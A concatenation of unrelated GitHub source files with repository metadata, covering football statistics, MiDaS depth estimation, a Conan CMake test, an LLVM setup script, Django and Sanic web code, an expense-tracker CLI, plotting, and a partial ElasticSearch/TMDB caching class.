player_dict['stdev'] = str(statistics.stdev(points))
print("Standard Deviation is: " + str(statistics.stdev(points)))
if statistics.mean(points) != 0 and len(points) >= 2:
player_dict['coeff_var'] = str(statistics.stdev(points)/statistics.mean(points))
print("Coefficient of Variance is: " + str(statistics.stdev(points)/statistics.mean(points)))
print("Number of games: " + str(len(points)))
player_dict['num_of_games'] = str(len(points))
db.players.insert(player_dict)
if __name__ == '__main__':
find()
| soboy2/pyrandom | fbstats.py | fbstats.py | py | 1,583 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "statistics.mean",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "statistics.mean",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "statistics.stdev",... |
12769514952 | import cv2
from cv2 import waitKey
import torch
import urllib.request
import os
import matplotlib.pyplot as plt
print(torch.__version__)
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"
# url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
# urllib.request.urlretrieve(url, filename)
model_type = "DPT_Large" # MiDaS v3 - Large (highest accuracy, slowest inference speed)
#model_type = "DPT_Hybrid" # MiDaS v3 - Hybrid (medium accuracy, medium inference speed)
#model_type = "MiDaS_small" # MiDaS v2.1 - Small (lowest accuracy, highest inference speed)
midas = torch.hub.load("intel-isl/MiDaS", model_type)
# change to gpu
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
midas.to(device)
midas.eval()
# Load transforms to resize and normalize the image for large or small model
midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms")
if model_type == "DPT_Large" or model_type == "DPT_Hybrid":
transform = midas_transforms.dpt_transform
else:
transform = midas_transforms.small_transform
# Load image and apply transforms
filename = '1646652789610919952.jpg'
img = cv2.imread(filename)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
input_batch = transform(img).to(device)
# Predict and resize to original resolution
with torch.no_grad():
prediction = midas(input_batch)
prediction = torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False
).squeeze()
output = prediction.cpu().numpy()
plt.imshow(output)
plt.show() | JohnLee16/InfraredImage2Depth | src/midas_depth.py | midas_depth.py | py | 1,628 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.__version__",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.hub.load",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "torch.hub",
"... |
2856076738 | import re, unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
class CMakeGeneratorTest(unittest.TestCase):
def extractMacro(self, name, text):
pattern = ".*(macro\(%s\).*?endmacro\(\)).*" % name
return re.sub(pattern, r"\1", text, flags=re.DOTALL)
def aux_cmake_test_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
generator = CMakeGenerator(conanfile)
aux_cmake_test_setup = generator._aux_cmake_test_setup()
# extract the conan_basic_setup macro
macro = self.extractMacro("conan_basic_setup", aux_cmake_test_setup)
self.assertEqual("""macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_flags_setup()
conan_set_find_paths()
endmacro()""", macro)
# extract the conan_set_find_paths macro
macro = self.extractMacro("conan_set_find_paths", aux_cmake_test_setup)
self.assertEqual("""macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
| AversivePlusPlus/AversivePlusPlus | tools/conan/conans/test/generators/cmake_test.py | cmake_test.py | py | 1,364 | python | en | code | 31 | github-code | 6 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "re.sub",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.DOTALL",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "conans.model.conan_file.C... |
39184026326 | # ----------------------------------------------------------------------
# |
# | Setup_custom.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2022-10-14 12:37:50
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2022
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
# pylint: disable=missing-module-docstring
import copy
import os
import uuid
import sys
import textwrap
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
from semantic_version import Version as SemVer # pylint: disable=unused-import
from Common_Foundation.ContextlibEx import ExitStack # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import PathEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Shell.All import CurrentShell # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Shell import Commands # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation.Streams.DoneManager import DoneManager # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import SubprocessEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import TextwrapEx # type: ignore # pylint: disable=import-error,unused-import
from Common_Foundation import Types # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap import Configuration # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap import Constants # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadNSISInstaller import DownloadNSISInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadSevenZipInstaller import DownloadSevenZipInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.DownloadZipInstaller import DownloadZipInstaller # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.Installer import Installer # type: ignore # pylint: disable=import-error,unused-import
from RepositoryBootstrap.SetupAndActivate.Installers.LocalSevenZipInstaller import LocalSevenZipInstaller # type: ignore # pylint: disable=import-error,unused-import
# ----------------------------------------------------------------------
from _install_data import GRCOV_VERSIONS, LLVM_VERSIONS
del sys.modules["_install_data"]
# ----------------------------------------------------------------------
def GetConfigurations() -> Union[
Configuration.Configuration,
Dict[
str, # configuration name
Configuration.Configuration,
],
]:
configurations: Dict[str, Configuration.Configuration] = {}
if CurrentShell.family_name == "Windows":
target_architectures = ["x64", ] # TODO: "x86"
else:
target_architectures = [CurrentShell.current_architecture, ]
common_foundation_dependency = Configuration.Dependency(
uuid.UUID("DD6FCD30-B043-4058-B0D5-A6C8BC0374F4"),
"Common_Foundation",
"python310",
"https://github.com/davidbrownell/v4-Common_Foundation.git",
)
for llvm_version in LLVM_VERSIONS.keys():
version_specs = Configuration.VersionSpecs(
[Configuration.VersionInfo("LLVM", SemVer(llvm_version)), ],
{},
)
if CurrentShell.family_name == "Windows":
for target_architecture in target_architectures:
configurations["{}-mingw-{}".format(llvm_version, target_architecture)] = Configuration.Configuration(
"""Uses LLVM 'v{}' (using mingw (aka "Msys2 MinGW Clang" at https://blog.conan.io/2022/10/13/Different-flavors-Clang-compiler-Windows.html)) targeting '{}'.""".format(llvm_version, target_architecture),
[common_foundation_dependency, ],
version_specs,
)
for msvc_version in [
"17.4",
]:
for target_architecture in target_architectures:
configurations["{}-msvc-{}-{}".format(llvm_version, msvc_version, target_architecture)] = Configuration.Configuration(
"""Uses LLVM 'v{}' (using Microsoft Visual Studio 'v{}' (aka "LLVM/Clang" at https://blog.conan.io/2022/10/13/Different-flavors-Clang-compiler-Windows.html)) targeting '{}'.""".format(
llvm_version,
msvc_version,
target_architecture,
),
[
Configuration.Dependency(
uuid.UUID("6e6cbb2c-6512-470f-ba88-a6e4ad85fed0"),
"Common_cpp_MSVC",
"{}-{}".format(msvc_version, target_architecture),
"https://github.com/davidbrownell/v4-Common_cpp_MSVC.git",
),
],
version_specs,
)
else:
for target_architecture in target_architectures:
configurations["{}-{}".format(llvm_version, target_architecture)] = Configuration.Configuration(
"Uses LLVM 'v{}' (without any external dependencies) targeting '{}'.".format(
llvm_version,
target_architecture,
),
[common_foundation_dependency, ],
version_specs,
)
return configurations
# ----------------------------------------------------------------------
def GetCustomActions(
# Note that it is safe to remove any parameters that are not used
dm: DoneManager,
explicit_configurations: Optional[List[str]],
force: bool,
interactive: Optional[bool],
) -> List[Commands.Command]:
commands: List[Commands.Command] = []
root_dir = Path(__file__).parent
assert root_dir.is_dir(), root_dir
# Create a link to the foundation's .pylintrc file
foundation_root_file = Path(Types.EnsureValid(os.getenv(Constants.DE_FOUNDATION_ROOT_NAME))) / ".pylintrc"
assert foundation_root_file.is_file(), foundation_root_file
commands.append(
Commands.SymbolicLink(
root_dir / foundation_root_file.name,
foundation_root_file,
remove_existing=True,
relative_path=True,
),
)
with dm.Nested("\nProcessing 'Common_LLVM' tools...") as extract_dm:
with extract_dm.Nested("Processing 'grcov'...") as grcov_dm:
for index, (grcov_version, install_data) in enumerate(GRCOV_VERSIONS.items()):
with grcov_dm.Nested("'{}' ({} of {})...".format(grcov_version, index + 1, len(GRCOV_VERSIONS))) as version_dm:
install_data.installer.Install(
version_dm,
force=force,
prompt_for_interactive=install_data.prompt_for_interactive,
interactive=interactive,
)
with extract_dm.Nested("Processing 'LLVM'...") as llvm_dm:
for index, (version, install_data_items) in enumerate(LLVM_VERSIONS.items()):
with llvm_dm.Nested(
"'{}' ({} of {})...".format(
version,
index + 1,
len(LLVM_VERSIONS),
),
) as version_dm:
if explicit_configurations and not any(explicit_configuration.startswith(version) for explicit_configuration in explicit_configurations):
version_dm.WriteVerbose("The version was skipped.\n")
continue
for install_data_item in install_data_items:
with version_dm.Nested("'{}'...".format(install_data_item.name)) as this_dm:
install_data_item.installer.Install(
this_dm,
force=force,
prompt_for_interactive=install_data_item.prompt_for_interactive,
interactive=interactive,
)
if CurrentShell.family_name != "Windows":
# Create a simple test program to ensure that LLVM was installed correctly
with version_dm.Nested("Validating installation...") as validate_dm:
temp_directory = CurrentShell.CreateTempDirectory()
was_successful = False
# ----------------------------------------------------------------------
def OnExit():
if was_successful:
PathEx.RemoveTree(temp_directory)
return
validate_dm.WriteInfo("The temporary directory '{}' has not been deleted.".format(temp_directory))
# ----------------------------------------------------------------------
with ExitStack(OnExit):
source_filename = temp_directory / "test.cpp"
with validate_dm.Nested("Creating source file..."):
with source_filename.open("w") as f:
f.write(
textwrap.dedent(
"""\
#include <iostream>
int main() {
std::cout << "Hello world!\\n";
return 0;
}
""",
),
)
with validate_dm.Nested("Compiling...") as compile_dm:
command_line = 'clang++ "{}"'.format(source_filename.name)
compile_dm.WriteVerbose("Command Line: {}\n\n".format(command_line))
modified_env = copy.deepcopy(os.environ)
modified_env["PATH"] = "{}:{}".format(
modified_env["PATH"],
install_data_item.installer.output_dir / "bin",
)
modified_env["LD_LIBRARY_PATH"] = "{}".format(
install_data_item.installer.output_dir / "lib" / "x86_64-unknown-linux-gnu",
)
result = SubprocessEx.Run(
command_line,
cwd=temp_directory,
env=modified_env, # type: ignore
)
compile_dm.result = result.returncode
if compile_dm.result != 0:
compile_dm.WriteError(
textwrap.dedent(
"""\
Errors here generally indicate that glibc has not been installed (especially if the error is associated with 'features.h').
Visit https://www.gnu.org/software/libc/ for more information.
Please install glibc using your distro's favorite package manager.
Examples:
Ubuntu: `apt-get install -y libc6-dev`
COMPILER ERROR
--------------
{}
""",
).format(
TextwrapEx.Indent(result.output.strip(), 4),
),
)
return []
with compile_dm.YieldVerboseStream() as stream:
stream.write(result.output)
with validate_dm.Nested("Testing...") as testing_dm:
command_line = "./a.out"
testing_dm.WriteVerbose("Command Line: {}\n\n".format(command_line))
result = SubprocessEx.Run(
command_line,
cwd=temp_directory,
)
testing_dm.result = result.returncode
if testing_dm.result == 0:
testing_dm.result = 0 if result.output == "Hello world!\n" else -1
if testing_dm.result != 0:
compile_dm.WriteError(result.output)
return []
with testing_dm.YieldVerboseStream() as stream:
stream.write(result.output)
was_successful = True
return commands
| davidbrownell/v4-Common_LLVM | Setup_custom.py | Setup_custom.py | py | 15,433 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.modules",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "RepositoryBootstrap.Configuration.Configuration",
"line_number": 60,
"usage_type": "attribute"
},
{
... |
42117272334 | from django.conf.urls import url
from django.contrib import admin
from users import views as usersViews
from bookmark import views as bookmarkViews
urlpatterns = [
url(r'^login', usersViews.login),
url(r'^logout', usersViews.logout),
url(r'^register', usersViews.register),
url(r'^bookmark/$', bookmarkViews.index),
url(r'^bookmark/form/(?P<id>[0-9]+)/$', bookmarkViews.edit),
url(r'^bookmark/form/$', bookmarkViews.new),
url(r'^bookmark/delete/(?P<id>[0-9]+)/$', bookmarkViews.delete),
url(r'^users/', usersViews.list),
url(r'^$', usersViews.home),
]
| jlneto15/bookmark | web/app/urls.py | urls.py | py | 589 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.conf.urls.url",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "users.views.login",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "users.views",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.conf.urls... |
4558179615 | import subprocess
from sanic import Sanic, response
# import os
app = Sanic(__name__)
app.ctx.restarting = False
@app.route("/")
async def test(_):
return response.html(open("index.html", encoding='utf-8').read())
def is_github_request(request):
# check if the request is from github, with the api key, the curl command is at the bottom of the file
return request.headers.get("Authorization") == "Bearer " + "ABC123"
@app.route("/restart", methods=["POST"])
def webhook(request):
# github actions posts to this endpoint, its @ the bottom of the file
# check if the request is from github, with the api key, the curl command is at the bottom of the file
if not is_github_request(request):
return response.text("Not Authorized", status=401)
subprocess.call(["git", "pull"])
return response.text("Restarting")
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000, auto_reload=True)
# whats command to create requirements.txt
| sooswastaken/continuous-integration | server.py | server.py | py | 994 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sanic.Sanic",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sanic.response.html",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sanic.response",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sanic.response.text",
... |
20869059181 | import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.cm as cm
import matplotlib
import random
vida=[]
defesa=[]
ataque=[]
#Spearador de Dados
def separador_atributos(arquivo):
vida_max=0
vida_min=18
def_max=0
def_min=18
atk_max=0
atk_min=18
numero_pontos=0
linha=arquivo.readline()
while linha:
atributos=linha.split()
#transfere para txt
vida.append(int(atributos[0]))
if(int(atributos[0])>vida_max):
vida_max=int(atributos[0])
if(int(atributos[0])<vida_min):
vida_min=int(atributos[0])
defesa.append(int(atributos[1]))
if(int(atributos[1])>def_max):
def_max=int(atributos[1])
if(int(atributos[1])<def_min):
def_min=int(atributos[1])
ataque.append(int(atributos[2]))
if(int(atributos[2])>atk_max):
atk_max=int(atributos[2])
if(int(atributos[2])<atk_min):
atk_min=int(atributos[2])
numero_pontos+=1
linha=arquivo.readline()
arquivo.close()
return(vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos)
def frequencia_absoluta(atributo ,atributo_max, atributo_min, numero_pontos):
num_atributo=[0]*18
maior_F=0
for i in range((atributo_max-atributo_min)+1): #verifica todos valores de atributo
for j in range(numero_pontos): #varre todo os pontos
if(atributo[j]==(i+1)): #se a atributo bater com a que esta sendo avaliada
num_atributo[i]+=((1/numero_pontos)) #armazena vetor def atk para atributo=[i]
if(num_atributo[i]>maior_F):
maior_F=num_atributo[i]
return(num_atributo)
def ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos):
c=[]
for i in range(numero_pontos):
c.append((frequencia_vida[(vida[i]-1)])*(frequencia_def[(defesa[i]-1)])*(frequencia_atk[(ataque[i]-1)]))
return(c)
def modelo_calculado():
modelo=open("../modelo.txt", "r")
linha=modelo.readline()
coeficientes=linha.split()
atk_amostras=[0]*1000
def_amostras=[0]*1000
vida_amostras=[0]*1000
for i in range(1000):
if (int(coeficientes[5])>=1):
def_amostras[i]=np.random.randint(int(coeficientes[5], int(coeficientes[6])))
else:
def_amostras[i]=np.random.randint((int(coeficientes[5])+1), int(coeficientes[6])+2)-1
vida_amostras[i]=np.random.randint(int(coeficientes[3]), int(coeficientes[4])+1)
#calcula atk
atk_amostras[i]=((vida_amostras[i]-float(coeficientes[0])-(float(coeficientes[1])*def_amostras[i]))/float(coeficientes[2]))
return(def_amostras, atk_amostras, vida_amostras)
#recolhe dados
arquivo=open("../dados/vencedor.txt", "r")
vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos=separador_atributos(arquivo)
frequencia_vida=frequencia_absoluta(vida ,vida_max, vida_min, numero_pontos)
frequencia_def=frequencia_absoluta(defesa ,def_max, def_min, numero_pontos)
frequencia_atk=frequencia_absoluta(ataque ,atk_max, atk_min, numero_pontos)
c=ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos)
def_amostras, atk_amostras, vida_amostras=modelo_calculado()
#plotando
fig=plt.figure()
ax=fig.add_subplot(111, projection='3d')
ax.text2D(0.05, 0.95, "Dispersao & Concentração Atributos(Vencedores)", transform=ax.transAxes)
ax.scatter(defesa, ataque, vida, cmap="cool", c=c)
ax.plot_trisurf(def_amostras, atk_amostras, vida_amostras, color="red")
ax.set_xlabel("Defesa",fontsize=13)
ax.set_ylabel("Ataque",fontsize=13)
ax.set_zlabel("Vida",fontsize=13)
#ax.legend(loc=3, bbox_to_anchor=(-0.5, -0.1))
#saida
ax.view_init(elev=30, azim=45)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores1.png", format='png')
ax.view_init(elev=30, azim=-20)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores2.png", format='png')
ax.view_init(elev=15, azim=-50)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores3.png", format='png')
| Edumarek123/Machine_Learning | graficos/graficos_dispersao.py | graficos_dispersao.py | py | 4,235 | python | pt | code | 0 | github-code | 6 | [
{
"api_name": "numpy.random.randint",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.randint",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.ran... |
71133520507 | from Logic.Crud import *
from Logic.Operatii import *
import datetime
def arata_meniu():
'''
:return: optiunile din meniu
'''
print("1.Adaugare cheltuiala")
print("2.Stergere cheltuiala")
print("3.Modificare cheltuiala")
print("4.Stergerea cheltuielilor pentru un nr de apartament")
print("5.Adaugre suma pentru toate cheltuielile dintr-o data citita de la tastatura")
print("6.Afisarea cheltuielilor cu suma cea mai mare pentru fiecare tip")
print("7.Ordonarea cheltuielilor crescator dupa suma")
print("8.Afisarea sumelor lunare pentru fiecare apartament")
print("9.Afisare lista")
print("10.Undo")
print("11.Redo")
print("0.Iesire")
def citire_data():
date_str=input("Dati data separate prin spatiu")
data=date_str.split(" ")
an=int(data[0])
luna=int(data[1])
zi=int(data[2])
return datetime.date(an,luna,zi)
def afisare_adaugare(lista,lst_undo,lst_redo):
"""
:param lista: lista cu cheltuielei
:return: se adauga cheltuiala creata in logic
"""
try:
id=int(input("Dati id :"))
nr_apartament = int(input('Dati nr apartamentului : '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin - :")
tipul = input("Dati tipul:")
return adaugare_cheltuiala(lista, id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere(lista,lst_undo,lst_redo):
'''
:param lista: o lista cu cheltuieli
:return: se sterge o cheltuiala din lista
'''
try:
nr_apartament = int(input("Dati nr apartamentului care va fi sters"))
return stergere_cheltuiala(nr_apartament, lista,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_modificare(lista,lst_undo,lst_redo):
'''
:param lista:lista de cheltuieli
:return: se modifica lista
'''
try:
id=int(input("Dati id "))
nr_apartament =int(input('Dati nr apartamentului de modificat: '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin -:")
tipul = input('Dati tipul: ')
return modificare_cheltuiala(lista,id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo):
'''
Se sterge ultima cheltuiala care are un nr de apartament dat
:param lista: lista de cheltuieli
:return: lista cu cheltuielile ramase
'''
nr_apartament=int(input("Introduceti nr de apartament:"))
return stergere_cheltuieli_pentru_un_apartament(lista,nr_apartament,lst_undo,lst_redo)
def afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_redo,lst_undo):
'''
:param lista: lista de cheltuieli
:return: se modifica lista cu cerintele din enunt
'''
dat= input("Dati data separata prin -:")
sum = int(input("Dati suma:"))
cheltuieli_lista = adunare_valoare_la_toate_cheltuielile(lista,dat,sum,lst_undo,lst_redo)
return cheltuieli_lista
def afisare_maxim_cheltuieli_pentru_fiecare_tip(lista):
tip_cheltuieli=max_cheltuiala_pentru_fiecare_tip(lista)
for tipul,cheltuiala in tip_cheltuieli.items():
print("{} : {}".format(tipul,cheltuiala))
def afisare_sume_lunare_cheltuieli(lista):
result = sume_lunare(lista)
for luna in result:
print(f'Pentru Luna {luna} avem lista de sume: {result[luna]}')
def afisare_lista(lista):
for cheltuiala in lista:
print(to_string(cheltuiala))
def afisare_undo(lista, lst_undo, lst_redo):
undo_result = undo(lista, lst_undo, lst_redo)
if undo_result is not None:
return undo_result
return lista
def afisare_redo(lista, lst_undo, lst_redo):
redo_result = redo(lista, lst_undo, lst_redo)
if redo_result is not None:
return redo_result
return lista
def interfata(lista,lst_undo,lst_redo):
"""meniulde comanda"""
while True:
arata_meniu()
op=int(input("Alegeti optiunea"))
if op == 1:
lista=afisare_adaugare(lista,lst_undo,lst_redo)
if op==2:
lista=afisare_stergere(lista,lst_undo,lst_redo)
if op==3:
lista=afisare_modificare(lista,lst_undo,lst_redo)
if op==4:
lista=afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo)
if op==5:
lista=afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_undo,lst_redo)
if op ==6:
print(max_cheltuiala_pentru_fiecare_tip(lista))
if op ==7:
lista = ordonare_cheltuieli_dupa_suma(lista,lst_undo,lst_redo)
if op==8:
afisare_sume_lunare_cheltuieli(lista)
if op == 9:
afisare_lista(lista)
if op ==10:
lista=afisare_undo(lista,lst_undo,lst_redo)
if op==11:
lista=afisare_redo(lista,lst_undo,lst_redo)
if op == 0:
break
else:
print("Invalid")
| AP-MI-2021/lab-567-Pop-Sergiu-Adrian | lab5/Ui/Interfata.py | Interfata.py | py | 5,122 | python | es | code | 0 | github-code | 6 | [
{
"api_name": "datetime.date",
"line_number": 30,
"usage_type": "call"
}
] |
6433666492 | import logging
import requests
import elasticsearch
import datetime
import os
import re
from .config import set_defaults
from jinja2 import Template
class ElasticTMDB(object):
def load_config(self):
set_defaults(self)
# Set HTTP headers for TMDB requests
self.headers = {}
self.headers["content-type"] = "application/json;charset=utf-8"
self.headers["Accept-Encoding"] = "gzip"
if not self.config["extra_logging"]:
logging.getLogger("elasticsearch").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
# ElasticSearch
elasticAuth = (self.config["es_username"], self.config["es_password"])
self.es = elasticsearch.Elasticsearch(hosts=self.config["es_host"],
port=self.config["es_port"],
scheme=self.config["es_scheme"],
http_auth=elasticAuth)
# Generate Index names and create them if they do not exists
self.config["title_index"] = "{}_{}_title".format(self.config["index_prefix"], self.config["title_type"])
self.config["search_index"] = "{}_{}_search".format(self.config["index_prefix"], self.config["title_type"])
self.check_index(indexName=self.config["title_index"], indexMappingFile="title.json")
self.check_index(indexName=self.config["search_index"], indexMappingFile="search.json")
# Get countries, generes, background base URL and languages from TMDB
if self.config["initial_cache_tmdb"]:
self.cache_configuration()
else:
logging.debug("Skipping Initial TMDB config...some functions might break")
def load_template(self, templateFile):
with open(os.path.join(os.path.dirname(__file__), "templates", templateFile), "r") as templateFile:
return Template(templateFile.read())
def send_request_get(self, endPoint=None, params=None):
if not params:
params = {}
if "language" not in params:
params["language"] = self.config["main_language"]
elif params["language"] == "":
del params["language"]
params["api_key"] = self.config["tmdb_api_key"]
if endPoint:
response = requests.get("https://api.themoviedb.org/3/{}".format(endPoint), params=params, headers=self.headers)
if response:
if response.status_code < 400:
return response.json()
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
def discover_title(self, page):
params = {}
params["sort_by"] = "popularity.desc"
params["page"] = page
discover = self.send_request_get(endPoint="discover/{}".format(self.config["title_type"]), params=params)
if discover:
return discover["results"]
def cache_title(self, title, force, record):
recordId = None
# Check if record exists in elasticsearch
if not record:
query = {"query": {"term": {"ids.tmdb": title["id"]}}}
esRecord = self.get_record_by_query(index=self.config["title_index"], query=query)
if esRecord["hits"]["hits"]:
recordId = esRecord["hits"]["hits"][0]["_id"]
record = esRecord["hits"]["hits"][0]["_source"]
else:
recordId = record["_id"]
esRecord = {"hits": {"hits": [record]}}
record = record["_source"]
if record:
# Check if record is up for an update
if self.check_update_required(timestamp=record["@timestamp"]):
force = True
if not recordId or force:
# Get details of title
params = {}
if title["original_language"] == self.config["exception_language"]:
params["language"] = self.config["exception_language"]
else:
params["language"] = self.config["main_language"]
title = self.send_request_get(endPoint="{}/{}".format(self.config["title_type"], title["id"]), params=params)
if title:
# Get title year, to be used for display
if not title.get(self.attrib["date"]):
titleYear = "None"
else:
titleYear = title[self.attrib["date"]][:4]
if recordId:
logging.info("Updating details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
else:
logging.info("Getting details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
# Add langauge if not in record
if "language" not in record:
record["language"] = title["original_language"]
# Add title if not in record
if "title" not in record:
record["title"] = title[self.attrib["title"]]
# Add country if not in record
if "country" not in record:
record["country"] = []
if "production_countries" in title:
for country in title["production_countries"]:
if country["iso_3166_1"] not in record["country"]:
record["country"].append(country["iso_3166_1"])
if "origin_country" in title:
for country in title["origin_country"]:
if country not in record["country"]:
record["country"].append(country)
# Add rating and number of votes
if "rating" not in record:
record["rating"] = {}
record["rating"]["tmdb"] = {}
record["rating"]["tmdb"]["votes"] = title["vote_count"]
record["rating"]["tmdb"]["average"] = title["vote_average"]
# Add original title to aliases if different
if "alias" not in record:
record["alias"] = []
if title[self.attrib["title"]] != title[self.attrib["original_title"]]:
if self.check_for_dup(title[self.attrib["original_title"]], record["alias"], record["title"]):
record["alias"].append(title[self.attrib["original_title"]])
# Release year
if "year" not in record:
record["year"] = None
if title[self.attrib["date"]] != "None":
if title[self.attrib["date"]]:
record["year"] = int(title[self.attrib["date"]][:4])
# Get genres
if "genre" not in record:
record["genre"] = []
for genre in title["genres"]:
if genre["id"] not in record["genre"]:
record["genre"].append(genre["id"])
# Get cast, director and other crew
if "credits" not in record:
record["credits"] = {}
cast = self.send_request_get(endPoint="{}/{}/credits".format(self.config["title_type"], title["id"]))
# Save top 10 cast
for person in sorted(cast["cast"], key=lambda k: (k["order"])):
if "actor" not in record["credits"]:
record["credits"]["actor"] = []
if len(record["credits"]["actor"]) < 10:
if self.check_for_dup(person["name"], record["credits"]["actor"]):
record["credits"]["actor"].append(person["name"])
# Save director and 5 other members of crew (producers etc)
for person in cast["crew"]:
if person["job"] == 'Director':
if "director" not in record["credits"]:
record["credits"]["director"] = []
if self.check_for_dup(person["name"], record["credits"]["director"]):
record["credits"]["director"].append(person["name"])
else:
if "other" not in record["credits"]:
record["credits"]["other"] = []
if len(record["credits"]["other"]) < 5:
if self.check_for_dup(person["name"], record["credits"]["other"]):
record["credits"]["other"].append(person["name"])
# Get description (and only keep first paragraph) save it only if longer then record if present
if "overview" in title:
if "description" not in record:
record["description"] = ""
# Keep only first paragraph of overview
regex = re.search(r'^(.+?)\n\n', title["overview"])
if regex:
overview = regex.group(1)
else:
overview = title["overview"]
# Keep longer one
if len(overview) > len(record["description"]):
record["description"] = overview
# Save tagline if incoming one is longer
if "tagline" in title:
if "tagline" not in record:
record["tagline"] = ""
if len(record["tagline"]) > len(record["tagline"]):
record["tagline"] = title["tagline"]
# Get translations
translations = self.send_request_get(endPoint="{}/{}/translations".format(self.config["title_type"], title["id"]))
for translation in translations["translations"]:
if translation["iso_639_1"] in self.config["languages"]:
# Add Aliases
if self.check_for_dup(translation["data"][self.attrib["title"]], record["alias"], record["title"]):
record["alias"].append(translation["data"][self.attrib["title"]])
# Get alternative titles
altTitles = self.send_request_get(endPoint="{}/{}/alternative_titles".format(self.config["title_type"], title["id"]))
for titleName in altTitles[self.attrib["alt_titles"]]:
if titleName["iso_3166_1"] in self.config["countries"]:
if self.check_for_dup(titleName["title"], record["alias"], record["title"]):
